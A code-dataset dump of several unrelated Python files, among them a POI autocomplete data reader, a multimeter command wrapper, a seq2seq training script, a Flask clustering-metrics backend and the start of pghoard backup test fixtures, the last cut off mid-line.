inputs['pos_addr_letter_id'] = fluid.layers.data(name=\"pos_addr_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.poi_word_id:\n inputs['pos_name_word_id'] = fluid.layers.data(name=\"pos_name_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n inputs['pos_addr_word_id'] = fluid.layers.data(name=\"pos_addr_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.use_geohash:\n inputs['pos_loc_geoid'] = fluid.layers.data(name=\"pos_loc_geoid\", shape=[40],\n dtype=\"int64\", lod_level=0)\n\n if self.is_training:\n inputs['neg_name_letter_id'] = fluid.layers.data(name=\"neg_name_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n inputs['neg_addr_letter_id'] = fluid.layers.data(name=\"neg_addr_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n \n if self._flags.poi_word_id:\n inputs['neg_name_word_id'] = fluid.layers.data(name=\"neg_name_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n inputs['neg_addr_word_id'] = fluid.layers.data(name=\"neg_addr_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.use_geohash:\n inputs['neg_loc_geoid'] = fluid.layers.data(name=\"neg_loc_geoid\", shape=[40],\n dtype=\"int64\", lod_level=0)\n \n else:\n #for predict label\n inputs['label'] = fluid.layers.data(name=\"label\", shape=[1],\n dtype=\"int64\", lod_level=0)\n inputs['qid'] = fluid.layers.data(name=\"qid\", shape=[1],\n dtype=\"int64\", lod_level=0)\n \n\n context = {\"inputs\": inputs}\n\n #set debug list, print info during training\n #context[\"debug_list\"] = [key for key in inputs] \n\n return context\n\n def _init_dict(self):\n \"\"\"\n init dict\n \"\"\"\n if self.inited_dict:\n return\n if self._flags.platform in ('local-gpu', 'pserver-gpu', 'slurm'):\n gpu_id = int(os.environ.get('FLAGS_selected_gpus', 0))\n self.place = fluid.CUDAPlace(gpu_id)\n else:\n self.place = fluid.CPUPlace()\n\n self.term_dict = {}\n if self._flags.qac_dict_path is not None:\n with open(self._flags.qac_dict_path, 'r') as f:\n for line in f:\n term, term_id = line.strip('\\r\\n').split('\\t')\n term = convert_to_unicode(term)\n self.term_dict[term] = int(term_id)\n\n self.inited_dict = True\n sys.stderr.write(\"loaded term dict:%s\\n\" % (len(self.term_dict)))\n\n def _pad_batch_data(self, insts, pad_idx, return_max_len=True, return_num_token=False):\n \"\"\"\n Pad the instances to the max sequence length in batch, and generate the\n corresponding position data and attention bias.\n \"\"\"\n return_list = []\n max_len = max(len(inst) for inst in insts)\n # Any token included in dict can be used to pad, since the paddings' loss\n # will be masked out by weights and make no effect on parameter gradients.\n inst_data = np.array(\n [inst + [pad_idx] * (max_len - len(inst)) for inst in insts])\n return_list += [inst_data.astype(\"int64\").reshape([-1, 1])]\n \n if return_max_len:\n return_list += [max_len]\n if return_num_token:\n num_token = 0\n for inst in insts:\n num_token += len(inst)\n return_list += [num_token]\n return return_list if len(return_list) > 1 else return_list[0]\n\n def _get_ids(self, seg_info):\n if len(seg_info) < 1:\n return [0], [0]\n bt = seg_info.split('\\3') \n if len(self.term_dict) < 1:\n letter_ids = map(int, bt[0].split())[:self._flags.max_seq_len]\n word_ids = map(int, bt[1].split())[:self._flags.max_seq_len]\n return letter_ids, word_ids\n\n rq = convert_to_unicode(\"\".join(bt))\n bl = [t for t in rq]\n letter_ids = [] \n for t in bl:\n letter_ids.append(self.term_dict.get(t.lower(), 1))\n if len(letter_ids) >= self._flags.max_seq_len:\n break\n\n word_ids = []\n for t in bt:\n t = convert_to_unicode(t)\n word_ids.append(self.term_dict.get(t.lower(), 1)) \n if len(word_ids) >= self._flags.max_seq_len:\n break\n return letter_ids, word_ids\n \n def _get_poi_ids(self, poi_str, max_num=0):\n if len(poi_str) < 1:\n return []\n ids = []\n all_p = poi_str.split('\\1')\n \n pidx = range(0, len(all_p))\n if max_num > 0 and len(all_p) > max_num:\n #neg sample: last 10 is negative sampling(not disp)\n neg_s_idx = len(all_p) - 10\n pidx = [1, 2] + list(random.sample(pidx[3:neg_s_idx], max_num - 13)) + list(pidx[neg_s_idx:]) \n bids = set()\n for x in pidx:\n poi_seg = all_p[x].split('\\2')\n #raw_text: name, addr, xy\n bid = poi_seg[0]\n name_letter_id, name_word_id = self._get_ids(poi_seg[0])\n addr_letter_id, addr_word_id = self._get_ids(poi_seg[1])\n ghid = list(map(int, poi_seg[2].split(','))) \n\n if not self.is_training and name_letter_id == [0]:\n continue # empty name\n if bid in bids:\n continue\n bids.add(bid)\n ids.append([name_letter_id, name_word_id, addr_letter_id, addr_word_id, ghid])\n\n return ids\n\n def deal_timestamp(self, timestamp):\n day_time_dt = datetime.datetime.fromtimestamp(timestamp)\n day = day_time_dt.strftime(\"%w\")\n time = day_time_dt.strftime(\"%H.%M\")\n day_id = int(day) * 2\n if 6 < float(time) < 18:\n return day_id\n else:\n return day_id + 1\n \n def parse_batch(self, data_gen):\n \"\"\"\n reader_batch must be true: only for train & loss_func is log_exp, other use parse_oneline\n pos : neg = 1 : N\n \"\"\"\n def _get_lod(k):\n return fluid.create_lod_tensor(np.array(batch_data[k][0]).reshape([-1, 1]),\n [batch_data[k][1]], self.place)\n \n batch_data = {}\n keys = None\n last_gh = None\n task_data = None\n process_batch = False\n for gh, line in data_gen:\n # print(gh)\n # print(last_gh)\n if last_gh == None:\n last_gh = gh\n task_data = [line]\n elif last_gh != gh:\n last_gh = gh\n process_batch = True\n else:\n task_data.append(line)\n\n if process_batch:\n # print(len(task_data))\n gen_data = []\n for task_line in task_data:\n # print(task_line)\n for s in self.parse_oneline(task_line):\n for k, v in s:\n if k not in batch_data:\n batch_data[k] = [[], []]\n \n if not isinstance(v[0], list):\n v = [v] #pos 1 to N\n for j in v:\n batch_data[k][0].extend(j)\n batch_data[k][1].append(len(j))\n\n if keys is None:\n keys = [k for k, _ in s]\n\n if len(batch_data[keys[0]][1]) == self._flags.train_batch_size:\n # print(keys)\n gen_data.append([(k, _get_lod(k)) for k in keys])\n batch_data = {}\n # if not self._flags.drop_last_batch and len(batch_data) != 0:\n # gen_data.append([(k, _get_lod(k)) for k in keys])\n \n # print(gen_data)\n task_data = [line]\n process_batch = False\n if len(gen_data):\n # print(len(gen_data))\n yield gen_data\n \n # if not self._flags.drop_last_batch and len(batch_data) != 0:\n # yield [(k, _get_lod(k)) for k in keys]\n\n def parse_oneline(self, line):\n \"\"\"\n datareader interface\n \"\"\"\n\n self._init_dict()\n qid, timestamp, gh, prefix, pos_poi, neg_poi = line.strip(\"\\r\\n\").split(\"\\t\")\n # day_id = self.deal_timestamp(float(timestamp))\n # day_input = [0] * 14\n # day_input[day_id] = 1\n logid = int(qid.split('_')[1])\n #step2\n prefix_loc_geoid = list(map(int, gh.split(',')))\n prefix_letter_id, prefix_word_id = self._get_ids(prefix)\n prefix_input = [(\"prefix_letter_id\", prefix_letter_id)]\n if self._flags.prefix_word_id:\n prefix_input.append((\"prefix_word_id\", prefix_word_id))\n if self._flags.use_geohash:\n prefix_input.append((\"prefix_loc_geoid\", prefix_loc_geoid))\n\n #step3\n pos_ids = self._get_poi_ids(pos_poi)\n pos_num = len(pos_ids)\n max_num = 0\n if self.is_training:\n max_num = max(20, self._flags.neg_sample_num) #last 10 is neg sample\n neg_ids = self._get_poi_ids(neg_poi, max_num=max_num)\n #if not train, add all pois\n if not self.is_training:\n pos_ids.extend(neg_ids[:-10] if len(neg_ids) > 10 else neg_ids)\n if len(pos_ids) < 1:\n pos_ids.append([[0], [0], [0], [0], [0] * 40, [0]])\n #step4\n idx = 0\n for pos_id in pos_ids:\n pos_input = [(\"pos_name_letter_id\", pos_id[0]), \\\n (\"pos_addr_letter_id\", pos_id[2])]\n if self._flags.poi_word_id:\n pos_input.append((\"pos_name_word_id\", pos_id[1]))\n pos_input.append((\"pos_addr_word_id\", pos_id[3]))\n if self._flags.use_geohash:\n pos_input.append((\"pos_loc_geoid\", pos_id[4]))\n\n if self.is_training:\n if len(neg_ids) > self._flags.neg_sample_num:\n #Noise Contrastive Estimation\n #if self._flags.neg_sample_num > 3:\n # nids_sample = neg_ids[:3]\n nids_sample = random.sample(neg_ids, self._flags.neg_sample_num)\n else:\n nids_sample = neg_ids\n\n if self._flags.reader_batch:\n if len(nids_sample) != self._flags.neg_sample_num:\n continue\n\n neg_batch = [[], [], [], [], []]\n for neg_id in nids_sample:\n for i in range(len(neg_batch)):\n neg_batch[i].append(neg_id[i]) \n \n neg_input = [(\"neg_name_letter_id\", neg_batch[0]), \\\n (\"neg_addr_letter_id\", neg_batch[2])]\n if self._flags.poi_word_id:\n neg_input.append((\"neg_name_word_id\", neg_batch[1]))\n neg_input.append((\"neg_addr_word_id\", neg_batch[3]))\n \n if self._flags.use_geohash:\n neg_input.append((\"neg_loc_geoid\", neg_batch[4]))\n yield prefix_input + pos_input + neg_input\n else:\n for neg_id in nids_sample:\n neg_input = [(\"neg_name_letter_id\", neg_id[0]), \\\n (\"neg_addr_letter_id\", neg_id[2])]\n if self._flags.poi_word_id:\n neg_input.append((\"neg_name_word_id\", neg_id[1]))\n neg_input.append((\"neg_addr_word_id\", neg_id[3]))\n if self._flags.use_geohash:\n neg_input.append((\"neg_loc_geoid\", neg_id[4]))\n yield prefix_input + pos_input + neg_input\n else:\n label = int(idx < pos_num)\n yield prefix_input + pos_input + [(\"label\", [label]), (\"qid\", [logid])]\n\n idx += 1\n\n\n# if __name__ == '__main__':\n# from utils import flags\n# from utils.load_conf_file import LoadConfFile\n# FLAGS = flags.FLAGS\n# flags.DEFINE_custom(\"conf_file\", \"./conf/test/test.conf\", \n# #\"conf file\", action=LoadConfFile, sec_name=\"Train\")\n# \"conf file\", action=LoadConfFile, sec_name=\"Evaluate\")\n \n# sys.stderr.write('----------- Configuration Arguments -----------\\n')\n# for arg, value in sorted(flags.get_flags_dict().items()):\n# sys.stderr.write('%s: %s\\n' % (arg, value))\n# sys.stderr.write('------------------------------------------------\\n')\n \n# dataset_instance = PoiQacPersonalized(FLAGS)\n# def _dump_vec(data, name):\n# print(\"%s\\t%s\" % (name, \" \".join(map(str, np.array(data)))))\n \n# def _data_generator(): \n# \"\"\"\n# stdin sample generator: read from stdin \n# \"\"\"\n# for line in sys.stdin:\n# if not line.strip():\n# continue\n# yield line\n\n# if FLAGS.reader_batch: \n# for sample in dataset_instance.parse_batch(_data_generator):\n# _dump_vec(sample[0][1], 'prefix_letter_id')\n# _dump_vec(sample[1][1], 'prefix_loc_geoid')\n# _dump_vec(sample[2][1], 'pos_name_letter_id')\n# _dump_vec(sample[3][1], 'pos_addr_letter_id')\n# _dump_vec(sample[6][1], 'pos_loc_geoid')\n# _dump_vec(sample[7][1], 'neg_name_letter_id or label')\n# else:\n# for line in sys.stdin:\n# for sample in dataset_instance.parse_oneline(line):\n# _dump_vec(sample[0][1], 'prefix_letter_id')\n# _dump_vec(sample[1][1], 'prefix_loc_geoid')\n# _dump_vec(sample[2][1], 'pos_name_letter_id')\n# _dump_vec(sample[3][1], 'pos_addr_letter_id')\n# _dump_vec(sample[6][1], 'pos_loc_geoid')\n# _dump_vec(sample[7][1], 'neg_name_letter_id or label')\n\n","sub_path":"ST_DM/KDD2021-MSTPAC/code/MST-PAC/datasets/poi_qac_personalized/qac_personalized.py","file_name":"qac_personalized.py","file_ext":"py","file_size_in_byte":16834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"462230495","text":"\"\"\"\nEncapsulate some of the commands to communicate with a Digital Multimeter.\n\"\"\"\nimport re\n\n_curly = re.compile(r'{.*}')\n\n\nclass _DMM1(object):\n models = ('34465A',)\n commands = {\n 'voltage': 'MEASURE:VOLTAGE:{ACDC}? [{RANGE}[,{RESOLUTION}]]',\n }\n\n\nclass _DMM2(object):\n models = ('3458A',)\n commands = {\n 'voltage': 'FUNC {ACDC}V[,{RANGE}[,{RESOLUTION}]]',\n }\n\n\ndef dmm_factory(connection_record, connection_class):\n \"\"\"Returns a class that encapsulates some of the commands to communicate with a Digital Multimeter.\n\n *To add a DMM to the list of supported DMM's see the source code of this module to follow the template.*\n\n This function is not meant to be called directly. Use the :meth:`~.EquipmentRecord.connect`\n method to connect to the equipment.\n\n Parameters\n ----------\n connection_record : :class:`~.record_types.ConnectionRecord`\n A connection record from a :ref:`connections-database`.\n connection_class : :class:`~.connection_message_based.ConnectionMessageBased` or :class:`~pyvisa.resources.MessageBasedResource`\n A connection subclass that communicates with the equipment through `read` and `write` commands.\n\n Returns\n -------\n :class:`~.connection.Connection`\n The `connection_class` that was passed in with additional methods for communicating with the DMM, provided\n that the model number of the DMM is one of the DMM's that is supported. Otherwise returns the original,\n unmodified `connection_class` object.\n \"\"\"\n class DMM(connection_class):\n\n def __init__(self, record):\n \"\"\"Base class for all supported Digital Multimeter's.\n\n Parameters\n ----------\n record : :class:`~.record_types.EquipmentRecord`\n A record from an :ref:`equipment-database`.\n \"\"\"\n super(DMM, self).__init__(record)\n\n def _cmd(self, key, **kwargs):\n \"\"\"Parse a formatted command string to construct the command message.\n\n Parameters\n ----------\n key : :class:`str`\n A key in the `commands` dictionary.\n kwargs\n The keyword arguments to do a \"find and replace\" in the formatted command string.\n\n Returns\n -------\n :class:`str`\n The command message to send to the equipment.\n \"\"\"\n cmd = ''\n for item in self.commands[key].split('['):\n text = re.search(_curly, item)\n if text is None:\n cmd += item\n break\n curly = text.group()\n value = kwargs[curly[1:-1]]\n if value is None:\n break\n cmd += re.sub(curly, str(value), item)\n cmd = cmd.replace(']', '').rstrip()\n self.log_debug('%s -> %s', self, cmd)\n return cmd\n\n def voltage_dc(self, range=None, resolution=None):\n cmd = self._cmd('voltage', ACDC='DC', RANGE=range, RESOLUTION=resolution)\n return float(self.query(cmd))\n\n def voltage_ac(self, range=None, resolution=None):\n cmd = self._cmd('voltage', ACDC='AC', RANGE=range, RESOLUTION=resolution)\n return float(self.query(cmd))\n\n #\n # return the _DMM# class that this model number belongs to\n #\n for cls in (_DMM1, _DMM2):\n if connection_record.model in cls.models:\n dmm = DMM\n dmm.commands = cls.commands\n return dmm\n return connection_class\n","sub_path":"msl/equipment/resources/dmm.py","file_name":"dmm.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"98601529","text":"class ListNode:\n def __init__(self,x):\n self.val=x\n self.next=None\n\ndef ReverseList(pHead):\n pReversedHead=None\n pNode=pHead\n pPrev=None\n while pNode!=None:\n ListNew=pNode.next\n if ListNew==None:\n pReversedHead=pNode\n pNode.next=pPrev #链表的反转\n\n pPrev=pNode\n pNode=ListNew\n\n return pReversedHead\n\n\ndef GetNewChart(list):\n if list:\n node=ListNode(list.pop(0))\n node.next=GetNewChart(list)\n return node\n\nif __name__=='__main__':\n list=[1,2,3,4,5,6]\n listN=GetNewChart(list)\n head=ReverseList(listN)\n print(head.val)\n","sub_path":"jianzhioffer/p142_24反转链表.py","file_name":"p142_24反转链表.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"484980775","text":"#!/usr/bin/env python3\nimport os\nimport random\nimport argparse\nimport logging\nimport numpy as np\nimport sys\nfrom tensorboardX import SummaryWriter\nimport time\nfrom libbots import data, model, utils\n\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nSAVES_DIR = \"../data/saves\"\n\nBATCH_SIZE = 32\nLEARNING_RATE = 1e-3\nMAX_EPOCHES = 100\nMAX_TOKENS = 40\nMAX_TOKENS_INT = 43\n\nlog = logging.getLogger(\"train\")\n\nTEACHER_PROB = 1.0\n\nTRAIN_QUESTION_PATH = '../data/auto_QA_data/mask_even/PT_train.question'\nTRAIN_ACTION_PATH = '../data/auto_QA_data/mask_even/PT_train.action'\nDIC_PATH = '../data/auto_QA_data/share.question'\nTRAIN_QUESTION_PATH_INT = '../data/auto_QA_data/mask_even_1.0%/PT_train_INT.question'\nTRAIN_ACTION_PATH_INT = '../data/auto_QA_data/mask_even_1.0%/PT_train_INT.action'\nDIC_PATH_INT = '../data/auto_QA_data/share_INT.question'\n\ndef run_test(test_data, net, end_token, device=\"cuda\"):\n bleu_sum = 0.0\n bleu_count = 0\n for p1, p2 in test_data:\n input_seq = net.pack_input(p1, net.emb, device)\n # enc = net.encode(input_seq)\n context, enc = net.encode_context(input_seq)\n # Return logits (N*outputvocab), res_tokens (1*N)\n # Always use the first token in input sequence, which is '#BEG' as the initial input of decoder.\n # The maximum length of the output is defined in class libbots.data.\n _, tokens = net.decode_chain_argmax(enc, input_seq.data[0:1],\n seq_len=data.MAX_TOKENS,\n context = context[0],\n stop_at_token=end_token)\n bleu_sum += utils.calc_bleu(tokens, p2[1:])\n bleu_count += 1\n return bleu_sum / bleu_count\n\nif __name__ == \"__main__\":\n logging.basicConfig(format=\"%(asctime)-15s %(levelname)s %(message)s\", level=logging.INFO)\n\n # command line parameters\n sys.argv = ['train_crossent.py', '--cuda', '--n=pretrained', '--att=0', '--lstm=1', '--int', '-w2v=300']\n\n parser = argparse.ArgumentParser()\n # parser.add_argument(\"--data\", required=True, help=\"Category to use for training. \"\n # \"Empty string to train on full processDataset\")\n parser.add_argument(\"--cuda\", action='store_true', default=False,\n help=\"Enable cuda\")\n parser.add_argument(\"-n\", \"--name\", required=True, help=\"Name of the run\")\n # Choose the function to compute reward (0-1 or adaptive reward).\n # If a = true, 1 or yes, the adaptive reward is used. Otherwise 0-1 reward is used.\n parser.add_argument(\"--att\", type=lambda x: (str(x).lower() in ['true', '1', 'yes']),\n help=\"Using attention mechanism in seq2seq\")\n parser.add_argument(\"--lstm\", type=lambda x: (str(x).lower() in ['true', '1', 'yes']),\n help=\"Using LSTM mechanism in seq2seq\")\n # If false, the embedding tensors in the model do not need to be trained.\n parser.add_argument('--embed-grad', action='store_false', help='the embeddings would not be optimized when training')\n parser.add_argument('--int', action='store_true', help='training model with INT mask information')\n parser.add_argument(\"-w2v\", \"--word_dimension\", type=int, default=50, help=\"The dimension of the word embeddings\")\n args = parser.parse_args()\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\n log.info(\"Device info: %s\", str(device))\n\n saves_path = os.path.join(SAVES_DIR, args.name)\n os.makedirs(saves_path, exist_ok=True)\n\n # To get the input-output pairs and the relevant dictionary.\n if not args.int:\n log.info(\"Training model without INT mask information...\")\n phrase_pairs, emb_dict = data.load_data_from_existing_data(TRAIN_QUESTION_PATH, TRAIN_ACTION_PATH, DIC_PATH, MAX_TOKENS)\n\n if args.int:\n log.info(\"Training model with INT mask information...\")\n phrase_pairs, emb_dict = data.load_data_from_existing_data(TRAIN_QUESTION_PATH_INT, TRAIN_ACTION_PATH_INT, DIC_PATH_INT, MAX_TOKENS_INT)\n\n # Index -> word.\n rev_emb_dict = {idx: word for word, idx in emb_dict.items()}\n log.info(\"Obtained %d phrase pairs with %d uniq words from %s and %s.\",\n len(phrase_pairs), len(emb_dict), TRAIN_QUESTION_PATH, TRAIN_ACTION_PATH)\n data.save_emb_dict(saves_path, emb_dict)\n end_token = emb_dict[data.END_TOKEN]\n # Word -> index.\n train_data = data.encode_phrase_pairs(phrase_pairs, emb_dict)\n rand = np.random.RandomState(data.SHUFFLE_SEED)\n rand.shuffle(train_data)\n log.info(\"Training data converted, got %d samples\", len(train_data))\n train_data, test_data = data.split_train_test(train_data)\n log.info(\"Train set has %d phrases, test %d\", len(train_data), len(test_data))\n if args.att:\n log.info(\"Using attention mechanism to train the SEQ2SEQ model...\")\n if args.lstm:\n log.info(\"Using LSTM mechanism to train the SEQ2SEQ model...\")\n else:\n log.info(\"Using RNN mechanism to train the SEQ2SEQ model...\")\n\n net = model.PhraseModel(emb_size=args.word_dimension, dict_size=len(emb_dict),\n hid_size=model.HIDDEN_STATE_SIZE, LSTM_FLAG=args.lstm, ATT_FLAG=args.att).to(device)\n net.cuda()\n log.info(\"Model: %s\", net)\n\n writer = SummaryWriter(comment=\"-\" + args.name)\n\n optimiser = optim.Adam(net.parameters(), lr=LEARNING_RATE)\n best_bleu = None\n\n time_start = time.time()\n\n for epoch in range(MAX_EPOCHES):\n losses = []\n bleu_sum = 0.0\n bleu_count = 0\n dial_shown = False\n random.shuffle(train_data)\n for batch in data.iterate_batches(train_data, BATCH_SIZE):\n optimiser.zero_grad()\n # input_idx: the ID matrix for the input tokens in a batch;\n # output_idx: the ID matrix for the output tokens in a batch;\n input_seq, out_seq_list, _, out_idx = net.pack_batch(batch, net.emb, device)\n # net.encode calls nn.LSTM by which the forward function is called to run the neural network.\n # enc is a batch of last time step's hidden state outputted by encoder.\n # enc = net.encode(input_seq)\n context, enc = net.encode_context(input_seq)\n\n net_results = []\n net_targets = []\n for idx, out_seq in enumerate(out_seq_list):\n ref_indices = out_idx[idx][1:]\n # Get the last step's hidden state and cell state of encoder for the idx-th element in a batch.\n enc_item = net.get_encoded_item(enc, idx)\n # Using teacher forcing to train the model.\n if random.random() < TEACHER_PROB:\n context_temp = context[idx]\n r = net.decode_teacher(enc_item, out_seq, context[idx])\n blue_temp = net.seq_bleu(r, ref_indices)\n bleu_sum += blue_temp\n # Get predicted tokens.\n seq = torch.max(r.data, dim=1)[1]\n seq = seq.cpu().numpy()\n # Train by using the argmax;\n else:\n r, seq = net.decode_chain_argmax(enc_item, out_seq.data[0:1],\n len(ref_indices), context[idx])\n blue_temp = utils.calc_bleu(seq, ref_indices)\n bleu_sum += blue_temp\n net_results.append(r)\n net_targets.extend(ref_indices)\n bleu_count += 1\n\n if not dial_shown:\n # data.decode_words transform IDs to tokens.\n ref_words = [utils.untokenize(data.decode_words(ref_indices, rev_emb_dict))]\n log.info(\"Reference: %s\", \" ~~|~~ \".join(ref_words))\n log.info(\"Predicted: %s, bleu=%.4f\", utils.untokenize(data.decode_words(seq, rev_emb_dict)), blue_temp)\n dial_shown = True\n results_v = torch.cat(net_results)\n results_v = results_v.cuda()\n targets_v = torch.LongTensor(net_targets).to(device)\n targets_v = targets_v.cuda()\n loss_v = F.cross_entropy(results_v, targets_v)\n loss_v = loss_v.cuda()\n loss_v.backward()\n optimiser.step()\n\n losses.append(loss_v.item())\n bleu = bleu_sum / bleu_count\n bleu_test = run_test(test_data, net, end_token, device)\n log.info(\"Epoch %d: mean loss %.3f, mean BLEU %.3f, test BLEU %.3f\",\n epoch, np.mean(losses), bleu, bleu_test)\n writer.add_scalar(\"loss\", np.mean(losses), epoch)\n writer.add_scalar(\"bleu\", bleu, epoch)\n writer.add_scalar(\"bleu_test\", bleu_test, epoch)\n if best_bleu is None or best_bleu < bleu_test:\n if best_bleu is not None:\n out_name = os.path.join(saves_path, \"pre_bleu_%.3f_%02d.dat\" %\n (bleu_test, epoch))\n torch.save(net.state_dict(), out_name)\n log.info(\"Best BLEU updated %.3f\", bleu_test)\n best_bleu = bleu_test\n\n if epoch % 10 == 0:\n out_name = os.path.join(saves_path, \"epoch_%03d_%.3f_%.3f.dat\" %\n (epoch, bleu, bleu_test))\n torch.save(net.state_dict(), out_name)\n print (\"------------------Epoch \" + str(epoch) + \": training is over.------------------\")\n\n time_end = time.time()\n log.info(\"Training time is %.3fs.\" % (time_end - time_start))\n print(\"Training time is %.3fs.\" % (time_end - time_start))\n\n writer.close()","sub_path":"S2SRL/train_crossent.py","file_name":"train_crossent.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"62899540","text":"from flask import Flask, jsonify\nfrom flask_cors import CORS\n\nimport os\nimport sys\nsys.path.append(os.path.abspath(\"./Clustering\"))\nfrom clusterEnsembles import clusterEnsembles\nfrom mdsUtils import MDSSimMatrixUtils\n\nruns = [\n\t\t\t\"./Clustering/Result/20News_Kmeans_Hashing.json\",\n \t\"./Clustering/Result/20News_Kmeans_TFIDF_Hashing.json\",\n \t\"./Clustering/Result/20News_Kmeans_TFIDF_LSA.json\",\n \t\"./Clustering/Result/20News_Kmeans_TFIDF.json\",\n\t \"./Clustering/Result/20News_Agglomerative_TFIDF.json\",\n\t \"./Clustering/Result/20News_Agglomerative_Hashing.json\",\n \t#\"./Clustering/Result/20News_Agglomerative_TFIDF_Hashing.json\",\n \t#\"./Clustering/Result/20News_Agglomerative_TFIDF_LSA.json\"\n\t\t]\n\nensembles = clusterEnsembles(runs)\n\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route(\"/\")\ndef hello():\n return \"Hello from Flask backend!\"\n\n\n@app.route(\"/barMatrix\")\ndef getBarMatrix():\n\tdic = ensembles.computeBarMatrix(dumpToFile = False)\n\treturn jsonify(dic)\n\n\n@app.route(\"/randomIndex\")\ndef getRandomIndex():\n\tdic = ensembles.computeRandIndex(dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/randomIndexMDS\")\ndef getRandomIndexMDS():\n\tdic = ensembles.computeRandIndex(dumpToFile = False)\n\treturn jsonify({'randomIndexMDS': MDSSimMatrixUtils(dic['randomIndex'])})\n\n\n@app.route(\"/adjustRandomIndex\")\ndef getAdjustRandomIndex():\n\tdic = ensembles.computeRandIndex(adjust = True, dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/adjustRandomIndexMDS\")\ndef getAdjustRandomIndexMDS():\n\tdic = ensembles.computeRandIndex(adjust = True, dumpToFile = False)\n\treturn jsonify({'adjustRandomIndexMDS':MDSSimMatrixUtils(dic['adjustRandomIndex'])})\n\n\n@app.route(\"/mutualInformation\")\ndef getMutualInfo():\n\tdic = ensembles.computeMutualInformation(dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/mutualInformationMDS\")\ndef getMutualInfoMDS():\n\tdic = ensembles.computeMutualInformation(dumpToFile = False)\n\treturn jsonify({'mutualInformationMDS':MDSSimMatrixUtils(dic['mutualInformation'])})\n\n\n@app.route(\"/normalizedMutualInformation\")\ndef getNormalizedMutualInfo():\n\tdic = ensembles.computeMutualInformation(NMI = True, dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/normalizedMutualInformationMDS\")\ndef getNormalizedMutualInfoMDS():\n\tdic = ensembles.computeMutualInformation(NMI = True, dumpToFile = False)\n\treturn jsonify({'normalizedMutualInformationMDS':MDSSimMatrixUtils(dic['normalizedMutualInformation'])})\n\n\n@app.route(\"/c2cMDS\")\ndef getc2cMDS():\n\tdic = ensembles.renderingc2cMDS\n\treturn jsonify(dic)\n\n\n@app.route(\"/variationOfInformation\")\ndef getVariationOfInfo():\n\tdic = ensembles.computeMutualInformation(VI = True, dumpToFile = False)\n\treturn jsonify(dic)\n\n@app.route(\"/variationOfInformationMDS\")\ndef getVariationOfInfoMDS():\n\tdic = ensembles.computeMutualInformation(VI = True, dumpToFile = False)\n\treturn jsonify({'variationOfInformationMDS':MDSSimMatrixUtils(dic['variationOfInformation'])})\n\n\n@app.route(\"/superObject\")\ndef getSuperObject():\n\tdic = ensembles.getSuperObject()\n\treturn jsonify(dic)\n\n\n\nif __name__ == \"__main__\":\n app.run(host = '127.0.0.1', port=9000)","sub_path":"Flask_Backend/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"573731785","text":"# Copyright (c) 2022 Aiven, Helsinki, Finland. https://aiven.io/\nimport random\nimport string\nfrom pathlib import Path\nfrom queue import Empty\nfrom test.base import CONSTANT_TEST_RSA_PUBLIC_KEY\nfrom typing import Any, Callable, Dict, Generator, Tuple\nfrom unittest.mock import MagicMock, Mock\n\nimport mock\nimport pytest\nfrom mock import patch\nfrom rohmu.delta.common import SnapshotFile, SnapshotResult, SnapshotState\nfrom rohmu.delta.snapshot import Snapshotter\nfrom rohmu.errors import FileNotFoundFromStorageError\n\nfrom pghoard.basebackup.chunks import ChunkUploader, HashFile\nfrom pghoard.basebackup.delta import DeltaBaseBackup, UploadedFilesMetric\nfrom pghoard.common import (BackupFailure, BaseBackupFormat, CallbackEvent, CallbackQueue, CompressionData, EncryptionData)\nfrom pghoard.metrics import Metrics\nfrom pghoard.transfer import TransferQueue\n\n\n@pytest.fixture(name=\"delta_paths\")\ndef fixture_delta_paths(tmp_path: Path) -> Generator[Tuple[Path, Path], None, None]:\n src = tmp_path / \"src\"\n dst = tmp_path / \"dst\"\n src.mkdir()\n dst.mkdir()\n yield src, dst\n\n\n@pytest.fixture(name=\"snapshotter\")\ndef fixture_snapshotter(delta_paths: Tuple[Path, Path]) -> Snapshotter:\n src, dst = delta_paths\n return Snapshotter(globs=[\"**/*\"], src=src, dst=dst)\n\n\nDeltaFilesGeneratorType = Callable[[int], Generator[Tuple[Path, str], None, None]]\n\n\n@pytest.fixture(name=\"delta_files_generator\")\ndef fixture_delta_files_generator(delta_paths: Tuple[Path, Path]) -> DeltaFilesGeneratorType:\n def delta_files(n: int):\n src, _ = delta_paths\n for i in range(n):\n file_name = Path(f\"test_{i}.dat\")\n\n with open(src / file_name, \"w\") as f:\n for _ in range(4):\n f.write(random.choice(string.ascii_letters) * 50)\n\n with HashFile(path=src / file_name) as hash_file:\n hash_file.read()\n file_hash = hash_file.hash.hexdigest()\n\n yield file_name, file_hash\n\n return delta_files\n\n\n@pytest.fixture(name=\"delta_file\")\ndef fixture_delta_file(delta_files_generator: DeltaFilesGeneratorType) -> Tuple[Path, str]:\n return next(delta_files_generator(1))\n\n\n@pytest.fixture(name=\"deltabasebackup\")\ndef fixture_deltabasebackup(tmp_path: Path) -> DeltaBaseBackup:\n transfer_queue: TransferQueue = TransferQueue()\n metrics = Metrics(statsd={})\n site_config = {\n \"prefix\": \"abc\",\n }\n encryption_data = 